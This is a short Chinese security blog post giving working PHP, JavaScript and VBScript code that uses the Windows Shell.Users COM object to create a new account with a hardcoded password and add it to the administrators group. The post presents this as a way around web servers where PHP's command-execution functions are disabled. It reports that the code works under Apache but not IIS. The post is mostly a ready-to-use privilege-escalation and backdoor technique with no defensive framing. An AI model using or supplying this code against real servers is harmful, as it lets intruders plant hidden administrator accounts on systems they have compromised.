php版shell.users加管理员帐号的方法

118 阅读 0 评论 78 点赞

当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen

以及wscript.shell 组建被禁用的情况下,这也许是一个机会。

代码如下:

复制代码

代码如下:

<?php
echo "<div align=center><b>PHP 版Shell.Users加管理员帐号</b></div>";
$username="IceSkin";
$password="skin.com";
$su = new COM("Shell.Users");
$h=$su->create($username);
$h->changePassword($password,"");
$h->setting["AccountType"] = 3;//这句很重要可以把用户加入administrators 组,
?>

对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。

下面是 LCX 的代码

js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;

vbs:
Set o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3

hi.baidu.com/南拳daddy

本文分类：安全攻防
浏览次数：118 次浏览
发布日期：2022-04-09 13:18:03
本文链接：https://www.uoften.com/article/109040.html

php版shell.users加管理员帐号的方法

评论列表共有 0 条评论

发表评论取消回复

php版shell.users加管理员帐号的方法

评论列表共有 0 条评论

发表评论 取消回复

发表评论取消回复